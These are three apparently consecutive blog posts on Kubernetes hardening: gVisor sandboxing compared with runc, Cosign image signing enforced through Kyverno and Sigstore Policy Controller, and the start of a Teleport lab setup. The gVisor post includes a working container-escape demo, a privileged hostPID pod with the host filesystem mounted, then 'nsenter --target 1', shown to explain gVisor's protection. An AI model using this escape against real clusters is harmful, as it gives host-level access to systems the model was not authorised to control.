Containers aren’t magic sandboxes; they’re just processes sharing the same kernel with a light dusting of isolation. That’s fine for speed, but it’s also why “container escapes” can show up (yes, back to my container escape obsession). They’re not exploits so much as reminders that namespaces aren’t armor.

Enter gVisor, Google’s user-space kernel that intercepts syscalls before they ever reach the host. Instead of trusting the Linux kernel to stay polite, gVisor runs your workload inside its own miniature kernel, enforcing isolation at the syscall boundary.

It sits somewhere between runc and a full-blown VM: fast enough to stay in the Kubernetes loop, but restrictive enough to squash most escape paths.

gVisor isn’t new, but it’s worth a burrito look—what it takes to install, where it shines, where it hurts, and why your favorite nsenter trick suddenly stops working.

Installing gVisor on Ubuntu (ARM)

I’m running this on my usual Mac setup: an Ubuntu ARM VM (Apple Silicon under the hood) with a kubeadm cluster using containerd as the runtime. Running something else should be fairly similar.

The plan:

Install the gVisor binaries (runsc and the containerd shim).
Tell containerd about the new runtime.
Restart containerd and sanity-check.

Do this on every node that will run gVisor-protected workloads.

0. Quick sanity checks

Make sure you’re on ARM64 and using containerd:

uname -m
containerd --version

1. Install the gVisor binaries

curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor.gpg
echo "deb [signed-by=/usr/share/keyrings/gvisor.gpg] https://storage.googleapis.com/gvisor/releases release main" | sudo tee /etc/apt/sources.list.d/gvisor.list
sudo apt update
sudo apt install -y runsc gvisor-containerd-shim

Validate:

runsc --version

2. Wire gVisor into containerd

Create or edit config.toml:

cat <"io.containerd.runtime.v1.linux"]
  shim_debug = true
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
  runtime_type = "io.containerd.runc.v2"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runsc]
  runtime_type = "io.containerd.runsc.v1"
EOF

Restart containerd:

sudo systemctl restart containerd

Running Kubernetes Pods with gVisor

Start by creating a RuntimeClass:

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc

Apply:

kubectl apply -f runtimeclass-gvisor.yaml

Now run a test pod:

apiVersion: v1
kind: Pod
metadata:
  name: gvisor-test
spec:
  runtimeClassName: gvisor
  containers:
    - name: ubuntu
      image: ubuntu:22.04
      command: ["bash", "-c", "sleep 36000"]

Apply and verify:

kubectl apply -f gvisor-test.yaml
kubectl get pod

Get the container ID and confirm it’s using gVisor:

CID=$(kubectl get pod gvisor-test -o jsonpath='{.status.containerStatuses[0].containerID}' | sed 's#containerd://##')
sudo runsc --root /run/containerd/runsc/k8s.io list | grep $CID

gVisor vs runc Deep Dive

Instead of starting with theory, we’re going to follow the Burrito Way™: look at what actually happens first, then decide what we think. Two Ubuntu containers, same image, same command, same cluster:

one using runc
one using runsc

The differences show you far more about gVisor’s philosophy than any diagram.

Each section includes:

test commands
what you should observe
and what it actually means

Test Setup: Ubuntu Pods (gVisor vs runc)

Baseline (runc)

apiVersion: v1
kind: Pod
metadata:
  name: nogvisor-test
spec:
  containers:
    - name: ubuntu
      image: ubuntu:22.04
      command: ["/bin/bash", "-c", "sleep 3600"]

gVisor

apiVersion: v1
kind: Pod
metadata:
  name: gvisor-test
spec:
  runtimeClassName: gvisor
  containers:
    - name: ubuntu
      image: ubuntu:22.04
      command: ["/bin/bash", "-c", "sleep 3600"]

Process Visibility (Inside the Container)

Commands

runc

kubectl exec -it nogvisor-test -- bash
ps aux

gVisor

kubectl exec -it gvisor-test -- bash
ps aux

Expected

runc: PID 1 (sleep), bash, ps
gVisor: PID 1 (sleep), bash, ps
TTY differs:
- runc → pts/0
- gVisor → ?

Assessment

Inside the container, gVisor looks almost identical to runc. PID namespaces behave the same. That’s the trick: gVisor changes the kernel boundary, not the container environment. From the inside, nothing looks strange.

Process Visibility (From the Host)

Commands

Check for runc container process:

ps aux | grep sleep

Check for gVisor process wrappers:

ps aux | grep runsc

Expected

runc: host sees sleep 3600 as a real process
gVisor: host sees runsc-sandbox, runsc-gofer, etc.

Assessment

This is where the façade cracks. With runc, containers are just host processes. With gVisor, your workload runs inside a userspace kernel, not directly on the host. This is the clearest indicator that gVisor is more than “runc but safer.”

TTY Behavior

Command

ps aux

Expected

runc: TTY = pts/0
gVisor: TTY = ?

Assessment

TTYs behave differently because gVisor doesn’t map container PTYs to real host pseudo-terminals. You’re talking to a virtualized console layer.

/proc Virtualization

Commands

cat /proc/modules | grep tcp_diag

Expected

runc: shows real kernel modules (matching host)
gVisor: empty or missing

Assessment

Under gVisor, /proc is synthetic. runsc generates a fake procfs, so nothing from the real kernel leaks through. Kernel modules, device info, and other structural details disappear entirely. This is strong proof that syscalls never reach the kernel directly.

Capabilities

Command

grep Cap /proc/self/status

Expected

runc:

CapEff: 00000000a80425fb

gVisor:

CapEff: 00000000a80405fb

Assessment

The masks look nearly identical, but they don’t mean the same thing.

In runc, capability bits map to real (namespaced) kernel capabilities.
In gVisor, the bits are synthetic values exposed by runsc so applications don't break.

Even if CAP_SYS_ADMIN shows up in the mask, the underlying syscalls never reach the host.
The permissions appear real, but the power behind them isn’t.

Syscall Behavior (strace)

Note: you need to install strace inside the container.

Commands

apt update && apt install -y strace
strace ls

Expected

runc:
```
execve("/usr/bin/ls", ["ls"], ...)
```

gVisor:

execve(0xffffffffffffffda, ["ls"], ...)

Assessment

On the host and in runc, execve shows a real path because the syscall goes directly into the host kernel.

gVisor shows a sentinel hex value instead of a path. That’s runsc intercepting the syscall before it reaches the kernel. The rest of the call trace often looks similar because gVisor emulates most of Linux’s syscall surface — but it’s emulation, not the real thing.

Filesystem & Mount Behavior

Commands

mount -t proc proc /mnt
touch /proc/sys/kernel/randomize_va_space

Expected

runc:

mount: /mnt: cannot mount proc read-only.

gVisor:
```
mount: /mnt: permission denied.
```

Assessment

Both runtimes reject the mount, but for completely different reasons:

In runc, the real kernel enforces container restrictions (read-only proc, etc.).
In gVisor, runsc denies the syscall immediately, before the kernel even sees it.

This highlights the fundamental boundary difference:
runc relies on the kernel’s own namespace model, while gVisor implements mount and filesystem semantics in userspace.

Simulating a Classic Container Escape (runc vs gVisor)

This is the last container escape demo. (Until the next one.)

runc Escape (Ubuntu Node)

Save as escape.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: escape
  labels:
    app: escape
spec:
  hostPID: true
  containers:
    - name: escape
      image: nicolaka/netshoot:latest
      command: ["sleep", "3600"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
  restartPolicy: Never

Apply and exec:

kubectl apply -f escape.yaml
kubectl exec -it escape -- bash

Escape to the host:

nsenter --target 1 --mount --uts --ipc --net --pid

You now land directly on the host:

uname
whoami
cat /etc/os-release

Trying the Same Escape Under gVisor

Now use the same pod spec, but with gVisor:

apiVersion: v1
kind: Pod
metadata:
  name: gvisor-escape
  labels:
    app: gvisor-escape
spec:
  hostPID: true
  runtimeClassName: gvisor
  containers:
    - name: escape
      image: ubuntu:22.04
      command: ["/bin/bash", "-c", "sleep 3600"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
  restartPolicy: Never

Exec in:

kubectl exec -it gvisor-escape -- bash
ps aux

PID 1 here is just the /pause infrastructure container.

Attempt the escape:

nsenter --target 1 --mount --uts --ipc --net --pid
# nsenter: failed to execute /bin/sh: No such file or directory

This drops you into the infra container’s namespaces — not the host — and the infra container has no shell.
Trying to pivot to your own namespace:

nsenter --target 3 --mount --uts --ipc --net --pid -- ls /
# works, but just shows your same container root

nsenter --target 3 --mount --uts --ipc --net --pid
# no visible change — you're already there

Nothing interesting happens because:

gVisor mediates all namespaces
/proc is virtualized
escape pivots that rely on host namespaces simply don’t exist

Same YAML. Very different outcome.
runc → host access.
gVisor → sandbox stays a sandbox.

Wrapping Up

Kubernetes makes containers feel tidy and predictable. YAML goes in, Pods come out, and somewhere in between the scheduler pretends it’s your friend. But once a container starts running, every security guarantee boils down to one question:

Who actually handles your syscalls?

With runc, the answer is: the host kernel.
Great for performance, great for density, and great for escape demos.
With gVisor, the answer becomes: a userspace kernel you don’t control from inside the container.
Syscalls stop inside runsc, /proc becomes synthetic, capabilities lose their teeth, mounts break differently, and classic escape tricks like nsenter --target 1 simply stop working because the host kernel never sees the request.

That’s the gVisor mindset: keep Kubernetes fast, but stop trusting the kernel as a security boundary.

Is gVisor a silver bullet? No. But it genuinely changes the attack surface without requiring VMs or a massive architectural overhaul. That makes it worth understanding.

I’ll revisit this later to look at additional examples (and the very real performance hit), but that’s it for now.

Signed, Sealed, and Admitted

Matt Brown — Wed, 05 Nov 2025 20:46:58 GMT

Kubernetes does a lot of things automatically — scheduling, networking, scaling. But trust isn’t one of them. If someone pushes an image to a registry with your project’s name on it, Kubernetes won’t ask questions. It’ll just pull and run.

Of course, that’s not exactly ideal. A single problematic image can skip right past scanning gates and land in production because the cluster never checked where it came from.

Fortunately, there’s an easy way to fix that: image signing.

Image signing proves who built an image and that it hasn’t changed since. Cosign (part of the Sigstore project) handles the signing and verification piece, giving your container images a verifiable identity. Kyverno, meanwhile, enforces that trust boundary inside the cluster — it can block any workload whose image isn’t signed by a trusted key.

In this post, we’ll:

Use Cosign to sign and verify a container image manually.
Create a Kyverno policy that rejects unsigned workloads.
Add a tiny GitHub Action so every new build is automatically signed before deployment.

No lengthy PKI setup — just practical, auditable trust you can drop into any Kubernetes cluster today.

Why Image Signing Matters

Let's run through a very simple example of why you might care about this whole signing thing.

Say you’ve got a clean build pipeline. Your team pushes to ghcr.io/company/backend:latest and Kubernetes pulls it straight into production. Everyone trusts that tag.

Then one day you spin up a fork, test a quick change, and push it back to the same tag. Oops. The registry accepts it. The cluster redeploys automatically. Now the cluster is running this somewhat mysterious thing.

Nothing malicious happened. There was no exploit, no compromised credential—just an overly trusted tag and a missing signature.

That’s what image signing solves. Instead of trusting that “latest” means yours, you trust that it’s signed by someone you actually know. Cosign adds that proof. Kyverno enforces it before anything runs.

Before we dive in, you can see this in action with a public example. Chainguard maintains a registry called cgr.dev, which hosts signed, minimal container images. Every image there—like cgr.dev/chainguard/nginx—is verifiable using Cosign and Sigstore’s transparency log.

Running a basic check with OIDC (don't worry we'll get to setting this all up soon):

matt.brown@matt ~ % cosign verify \
  --certificate-identity-regexp "https://github.com/chainguard-images/images/.*" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  cgr.dev/chainguard/nginx

Verification for cgr.dev/chainguard/nginx:latest --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - Existence of the claims in the transparency log was verified offline
  - The code-signing certificate was verified using trusted certificate authority certificates

You’ll see Cosign validate the signature and confirm it was signed through GitHub’s OIDC workflow. That’s what we’re building toward: verifiable image trust that proves where your workloads come from.

Setup Cosign

Before we sign anything, we need to make sure Cosign is installed and working locally.

Install Cosign on macOS

The easiest way to get Cosign on macOS is with Homebrew. The catch? Homebrew currently ships Cosign 3.x, which switched from creating separate .sig files to storing signatures as OCI bundles.

That change is great for the future, but today it breaks verification with Kyverno (and a few other tools that still expect legacy .sig tags).

Installing the newest Cosign is worse than what Alice had to experience.

If we search Homebrew, we see only one formula:

brew search cosign
==> Formulae
cosign

So, to stay compatible with Kyverno, we’ll install Cosign 2.6.1 manually using Go.

First, install Go and make sure your $PATH includes $HOME/go/bin (skip if you already have Go):

brew install go
echo 'export PATH="$PATH:$HOME/go/bin"' >> ~/.zshrc
source ~/.zshrc

Then install Cosign 2.6.1:

go install github.com/sigstore/cosign/v2/cmd/cosign@v2.6.1

Once installed, confirm your version:

cosign version

Expected output:

  ______   ______        _______. __    _______ .__   __.
 /      | /  __  \      /       ||  |  /  _____||  \ |  |
|  ,----'|  |  |  |    |   (----`|  | |  |  __  |   \|  |
|  |     |  |  |  |     \   \    |  | |  | |_ | |  . `  |
|  `----.|  `--'  | .----)   |   |  | |  |__| | |  |\   |
 \______| \______/  |_______/    |__|  \______| |__| \__|
cosign: A tool for Container Signing, Verification and Storage in an OCI registry.

GitVersion:    v2.6.1
GitCommit:     unknown
GitTreeState:  unknown
BuildDate:     unknown
GoVersion:     go1.25.3
Compiler:      gc
Platform:      darwin/arm64

Generating Signing Keys

Now onto generating our keys.

Cosign Generated

The easiest way to get started is to use Cosign's built in key generation capability. Generate keys using the generate-key-pair command. It will require a password for your private key.

matt.brown@matt ~ % cosign generate-key-pair
Enter password for private key:
Enter password for private key again:
Private key written to cosign.key
Public key written to cosign.pub

That gives you:

matt.brown@matt ~ % ls | grep cosign
cosign.key
cosign.pub

You can view the public key by simply opening it. Who would have thought? But we will need this later.

matt.brown@matt ~ % cat cosign.pub
-----BEGIN PUBLIC KEY-----
...
-----END PUBLIC KEY-----

You can also regenerate this at any time with cosign public-key --key cosign.key if you ever lose the .pub file.

Non Cosign Generated

You can also use keys generated outside of Cosign. You import them to get them Cosign formatted.

Here's a quick command to generate a new elliptic-curve private key using the P-256 curve and save it as private.pem.

openssl ecparam -name prime256v1 -genkey -noout -out private.pem
`

Then use the Cosign import capability.

matt.brown@matt ~ % cosign import-key-pair --key private.pem
Enter password for private key:
Enter password for private key again:
Private key written to import-cosign.key
Public key written to import-cosign.pub

End result is the same, we can now sign images.

Shipping Signed Images

So now we have our keys set. This means we're ready to hit the next step, which is to actually sign the image. You knew we'd get here at some point. We complete the process by pushing it to a repository.

Using Github Container Registry is my preferred way, but do it with Dockerhub or something else if you prefer.

Let's build our image. You can use any image of course, but feel free to use mine (https://github.com/sf-matt/hello-flask-signed). This is just a simple Flask app.

matt.brown@matt hello-flask-signed % docker buildx build --platform linux/amd64,linux/arm64  -t ghcr.io/sf-matt/hello-flask-signed:v1 --push .
[+] Building 5.2s (12/12) FINISHED                                                             docker:desktop-linux
 => [internal] load build definition from Dockerfile                                                           0.0s
 => => transferring dockerfile: 257B                                                                           0.0s
 => [internal] load metadata for docker.io/library/python:3.12-slim     
...

Now sign it.

matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key sfmatt/hello-flask-signed:v1
WARNING: Image reference sfmatt/hello-flask-signed:v1 uses a tag, not a digest, to identify the image to sign.
    This can lead you to sign a different image than the intended one. Please use a
    digest (example.com/ubuntu@sha256:abc123...) rather than tag
    (example.com/ubuntu:latest) for the input to cosign. The ability to refer to
    images by tag will be removed in a future release.

For some reason I thought signing it by tag was a smart idea. Cosign quickly shut me down, albeit they don't do the best job of explaining why. But of course the reason is fairly simple.

Tags like :v1 are mutable. If the tag later points to a new image, your old signature still looks valid for the tag, even though the underlying image changed. That breaks the entire trust model. The digest uniquely identifies that exact build. Once signed, no one can change what it points to without invalidating the signature.

Cosign solves this by signing by digest, not tag. Seems this signing by tag will not even be an option in the future. So let's grab the digest if you didn't save it and do it that way. We’ll use Crane, a lightweight CLI from Google’s go-containerregistry project that makes it easy to inspect, copy, and manipulate container images right from the terminal. Install via Brew if you don't have it.

matt.brown@matt ~ % brew install crane
matt.brown@matt hello-flask-signed % crane digest ghcr.io/sf-matt/hello-flask-signed:v1
sha256:blahblah

Take that returned value to sign.

matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
Enter password for private key:
WARNING: "ghcr.io/sf-matt/hello-flask-signed" appears to be a private repository, please confirm uploading to the transparency log at "https://rekor.sigstore.dev"
Are you sure you would like to continue? [y/N] N

Interesting, what exactly does this mean. When you sign a private image, Cosign will warn you that it’s uploading metadata to the public Rekor transparency log or tlog.

What’s actually published

Cosign never uploads your image contents. From my investigation it creates just a small record containing:

the image digest (the SHA256 hash),
your signing certificate (for keyless),
and a cryptographic proof that the entry exists in the log.

This allows anyone to later verify when and by whom an image was signed. That’s great for public supply chains, but not usually necessary for internal builds.

Why we don’t need Rekor here (IMO)

If you’re just signing and verifying images you built to run in your cluster, you already control both the registry and the verification policy. Publishing to a public transparency log adds no security benefit. It just makes your internal image digests public.

Then let's skip the tlog. We can tell Cosign not to publish to Rekor when signing private images. And we add `--recursive`` to account for a multi arch image.

cosign sign --tlog-upload=false --key cosign.key --recursive   ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah

You’ll still get a valid signature that Kyverno can verify, but no public audit entry. And that is it. We have our signed image. The next question is what exactly did that do.

Verifying a Signature

So far, Cosign gave us no visible proof in our terminal that we are signed. To at least confirm it is signed go ahead and verify against our public key:

matt.brown@matt cosign-generated-keys % cosign verify \
  --key cosign.pub \
  --insecure-ignore-tlog=true \
  ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah

WARNING: Skipping tlog verification is an insecure practice that lacks transparency and auditability verification for the signature.

Verification for ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah--
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{"critical":{"identity":{"docker-reference":"ghcr.io/sf-matt/hello-flask-signed"},"image":{"docker-manifest-digest":"sha256:blahblah"},"type":"cosign container image signature"},"optional":null}]

That’s the confirmation. But what do we have exactly. Well to find the signature we are looking for let's do a triangulate.

matt.brown@matt cosign-generated-keys % cosign triangulate ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig

Ok let's see the artifact in GHCR using tree.

matt.brown@matt cosign-generated-keys % cosign tree ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
📦 Supply Chain Security Related artifacts for an image: ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
└── 🔐 Signatures for an image tag: ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
   └── 🍒 sha256:different-blahblah

You can check the Github UI for this signature as well.

What the `.sig` Image Actually Is

When Cosign signs an image with 2.x and before it pushes a signature artifact back into the registry. That artifact appears as a tag ending in .sig, as we saw with ghcr.io/sf-matt/hello-flask-signed:sha256-.sig. Behind the scenes, this is just an OCI manifest that contains a small JSON bundle with the signature, certificate (if keyless), and optional transparency-log proof. Cosign and tools like Kyverno automatically discover and verify this artifact when checking your image, so you never have to handle the .sig directly.

OIDC with Sigstore

For public images, we can skip local keys entirely and sign using Sigstore’s keyless mode. This super easy mode authenticates you through your GitHub identity (or a couple others) via OpenID Connect (OIDC).

Since this example uses a public image, you can follow along with mine:
ghcr.io/sf-matt/hello-flask-oidc:v1.

To sign it, just run the same as before but with absolutely no keys.

cosign sign ghcr.io/sf-matt/hello-flask-oidc@sha256:04147f2536d03c40a3ac595de6c1c87f06924b775dc92442e0b3b04e5ed5793e

Cosign will open a browser window and ask you to log in with GitHub (or others). Once authenticated, it issues a short-lived signing certificate from Fulcio and uploads the signature to both the registry and the Rekor transparency log.

You’ll see a message confirming the signature and transparency log entry:

Retrieving signed certificate...
Successfully verified SCT...
tlog entry created with index: 672916270
Pushing signature to: ghcr.io/sf-matt/hello-flask-oidc

To verify the signature:

cosign verify   --certificate-identity "sdmattbrown@gmail.com"   --certificate-oidc-issuer "https://github.com/login/oauth"   ghcr.io/sf-matt/hello-flask-oidc@sha256:

Cosign will validate the certificate, confirm its entry in Rekor, and show the signed claims. No local keys, no password prompts, just OIDC-based signing tied to your GitHub identity.

Boom.

Validating Image via Kyverno

Ok let's move to the more interesting part, K8s. We start by setting up an [ImageValidatingPolicy (https://kyverno.io/docs/policy-types/image-validating-policy/). Here is an example for our initial signed image.

If you need some guidance installing Kyverno it is just a simple Helm deploy, but more details can be found in an older post.

apiVersion: policies.kyverno.io/v1alpha1
kind: ImageValidatingPolicy
metadata:
  name: ghcr-check-images
spec:
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: ["v1"]
      operations: ["CREATE"]
      resources: ["pods"]

  evaluation:
    background:
      enabled: false

  validationActions: [Deny]
  failurePolicy: Ignore 

  attestors:
  - name: cosign
    cosign:
      key:
        data: |
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMitBUveNmKw57+UdJ3+mbGKlWp5B
          oWm+HWOBKap2V0Oa2whm/IHHoqReZUPdgj+fsAGyyBvSlbbfQV44zJhx5w==
          -----END PUBLIC KEY-----

  validations:
  - expression: >
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &&
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) > 0
          : true
      )
    message: all images from ghcr.io/sf-matt must have a valid Cosign signature

This Kyverno ImageValidatingPolicy does the following:

Scope: Applies to all Pod CREATE operations.
Target: Only evaluates images pulled from ghcr.io/sf-matt.
Attestor: Uses an embedded Cosign public key for signature verification.
Logic: Runs verifyImageSignatures() on each container image.
Enforcement: Denies workloads if any image from your GHCR namespace isn’t signed by that trusted key.
Behavior: Ignores other registries and disables background scans (evaluation happens only at creation).

In short: if it comes from your namespace and isn’t cryptographically signed, it never runs.

A problem will arise if your GitHub Container Registry (GHCR) is private, which we have done in this example. Kyverno needs credentials to pull and verify signatures. You can provide these using a standard Kubernetes Secret of type dockerconfigjson.

Generate a GitHub Personal Access Token (classic or fine-grained) with read:packages permission,
then create the secret in the same namespace where Kyverno runs (usually kyverno). Running it imperatively is easy enough.

kubectl create secret docker-registry ghcr-creds   --docker-server=ghcr.io   --docker-username=   --docker-password=   --docker-email=   -n kyverno

Confirm creation:

kubectl get secret ghcr-creds -n kyverno

Then reference the secret inside your ImageValidatingPolicy using the credentials field. This tells Kyverno to use your GHCR credentials when verifying Cosign signatures for private images.

apiVersion: policies.kyverno.io/v1alpha1
kind: ImageValidatingPolicy
metadata:
  name: ghcr-check-images
spec:
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: ["v1"]
      operations: ["CREATE"]
      resources: ["pods"]

  evaluation:
    background:
      enabled: false

  validationActions: [Deny]
  failurePolicy: Ignore 

  credentials:
    providers:
    - "github"
    - "default" 
    secrets: 
    - "ghcr-creds"

  attestors:
  - name: cosign
    cosign:
      key:
        data: |
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----
      ctlog:
        insecureIgnoreTlog: true
        url: "https://rekor.sigstore.dev"


  validations:
  - expression: >
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &&
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) > 0
          : true
      )
    message: all images from ghcr.io/sf-matt must have a valid Cosign signature

But here's the problem I've run into. It somehow looks for secrets as a cluster-wide object. If you turn up the logs you can see the following.

2025-11-03T22:22:02Z -5 k8s.io/client-go@v0.33.3/transport/round_trippers.go:632 > Response logger=klog milliseconds=1 status="404 Not Found" url=https://10.96.0.1:443/api/v1/secrets/ghcr-creds v=6 verb=GET

So while it will work if you switch the image to public, that sorta defeats the point of what we're trying here. So let's switch to a good old ClusterPolicy with verifyImages.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: check-ghcr-image
spec:
  webhookConfiguration:
    failurePolicy: Fail
    timeoutSeconds: 30
  background: false
  rules:
    - name: check-ghcr-image
      match:
        any:
        - resources:
            kinds:
              - Pod
      verifyImages:
      - imageReferences:
        - "ghcr.io/sf-matt/hello-flask*"
        failureAction: Enforce
        attestors:
        - entries:
          - keys:
              publicKeys: |-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
              rekor:
                ignoreTlog: true
                url: https://rekor.sigstore.dev
                pubkey: |-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
              ctlog:
                ignoreSCT: true
                pubkey: |-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----

And now you should be able to deploy it just fine. And if you have Policy Reporter running you can see it pass.

You actually wouldn’t have been able to see that for ImageValidatingPolicy. Another plus for ClusterPolicy.

Sigstore Policy Controller

Going through the process of validating with Kyverno feels quite clunky. So let's try another way.

In the Sigstore docs I found their Policy Controller, which is just an admission controller. So let's try using Sigstore policy-controller to accomplish the same as what we did with Kyverno.

We'll start by using the cosign generated keypair from before or you can create a new one. You could reuse the previous app or create a new one.

Install Policy-Controller

Let's get started with installing policy-controller.

helm repo add sigstore https://sigstore.github.io/helm-charts
helm repo update
helm upgrade --install policy-controller sigstore/policy-controller   -n cosign-system --create-namespace

Then you need to label the namespace to test.

Beware that when you do this if you have no policy for an image you will be blocked from deploying that image.

kubectl label namespace default policy.sigstore.dev/include=true

Now we have our newest Admission Controller installed. Let's create a ClusterImagePolicy that requires your keypair signature. Inline the public key (PEM).

apiVersion: policy.sigstore.dev/v1beta1
kind: ClusterImagePolicy
metadata:
  name: require-cosign-keypair
spec:
  mode: enforce
  images:
    - glob: ghcr.io/sf-matt/hello-flask*
  authorities:
    - key:
        data: |
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----

Deploy your new policy.

kubectl apply -f require-cosign-keypair.yaml

Then try deploying the same workload. It should deploy fine. You can see the validations by looking at the logs.

kubectl -n cosign-system logs deploy/policy-controller-webhook

You should see something like the following:

{...Validated 1 policies for image ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah...}

And that is that. It works quite easily. No issues with image pull secrets and no complex CEL expressions (although we dropped that with a ClusterPolicy). Although it is not ideal to have another Admission Controller, their very nature allows them to stack. So something definitely worth considering. And the overhead of the one pod is not too high.

    Limits:
      cpu:     200m
      memory:  512Mi
    Requests:
      cpu:      100m
      memory:   128Mi

Wrap Up

Kubernetes will happily run whatever you hand it — no questions asked. It doesn’t check signatures, provenance, or who actually built the thing. It’s the ultimate easy button.

Image signing is the missing trust layer most teams skip, even though it’s absurdly simple to add. Sure, it’s CI-friendly too, but this wasn’t meant to be another “here’s a GitHub Action” post.

With Cosign, you can give every build a verifiable identity. Whether that's through your own keypair or keyless signing tied to GitHub’s OIDC workflow. With Kyverno, you can draw clear boundaries around what’s allowed to run in the cluster. And with Sigstore Policy Controller, you can tighten that loop with much simpler and more direct policies.

Together, they turn the Kubernetes API into an actual supply-chain checkpoint. If something shows up unsigned, tampered with, or built outside your pipelines, it simply doesn’t start.

The best part? It’s dead simple. All open source, all auditable, and built on the same foundations powering modern supply-chain security.

So go for the low-hanging fruit — start by making sure your cluster only runs what’s been signed and proven to be yours.

Access Control, Actually: Teleport To the Rescue

Matt Brown — Mon, 20 Oct 2025 21:27:33 GMT

Last time, we walked the whole chain of Kubernetes access — from SSH on the node to the default service account that every Pod inherits. That exercise made one thing clear: Kubernetes doesn’t have a single front door. It has a series of loosely connected locks, and most of them assume you’ll do the right thing.

RBAC gives us policy, not identity. It answers what someone can do, not who they are. And that’s where setups can easily stop. Developers authenticate to Okta or GitHub, grab a kubeconfig from somewhere, and the cluster happily trusts whatever cert that file presents. In other words, Kubernetes leaves the identity problem unsolved.

There has to be a better way, right?

What if every access request were tied to a real human identity — backed by short-lived credentials and logged end to end — without touching the Kubernetes API?

That’s what Teleport does. It takes the same basic primitives (certificates, RBAC, and Kubernetes’ native API) and layers an auditable, identity-aware access proxy on top.

In this post, we’ll set up a local Teleport instance, connect it to a cluster, and replace our kubeconfig with short-lived, verifiable identity. Sounds pretty good.

Note on Licensing Teleport’s open-source edition is released under AGPL-3.0, which (according to my research) means that if you modify and run it as a network service for others, you’re expected to share your source code. For most personal labs and internal deployments, this isn’t an issue. I’ll cover open-source licensing in more detail in a separate post. It’s a surprisingly interesting topic.

The Lab Setup (Welcome to Hell)

Ugh, this was not a fun exercise. Of course at the end it was so easy to understand. If you want to do this in a local environment the instructions should work a charm. The instructions from the Teleport docs mostly work, but of course not perfectly.

I started simple: one Teleport proxy in Docker and a self-signed certificate with mkcert. Nothing fancy, no external dependencies. This was all done on my kubeadm controlplane node.

Install `mkcert`

sudo apt install mkcert
mkcert -install

Next create a cert folder where we store certs and share with our Docker container. Also add the mkcert CA to that folder. The trickiest part was getting the cert right. setting it to the IP address of the Controlplane node was the key.

mkdir teleport-tls
cd teleport-tls
mkcert 192.168.64.4 #Or your node IP
cp "$(mkcert -CAROOT)/rootCA.pem" .

Spin Up Docker

Now we have to spin up our Teleport Docker instance. Of course make sure Docker is installed on your node.

docker run -it -v .:/etc/teleport-tls -p 3080:443 ubuntu:22.04

Install Teleport inside the container

apt-get update && apt-get install -y curl
cp /etc/teleport-tls/rootCA.pem /etc/ssl/certs/mkcertCA.pem
curl https://cdn.teleport.dev/install.sh | bash -s 18.2.4

Then generate a config file with the generated certs:

teleport configure -o file \
  --cluster-name=teleport \
  --public-addr=192.168.64.4:3080 \
  --cert-file=/etc/teleport-tls/192.168.64.4.pem \
  --key-file=/etc/teleport-tls/192.168.64.4-key.pem

Finally, start it up:

teleport start --config=/etc/teleport.yaml

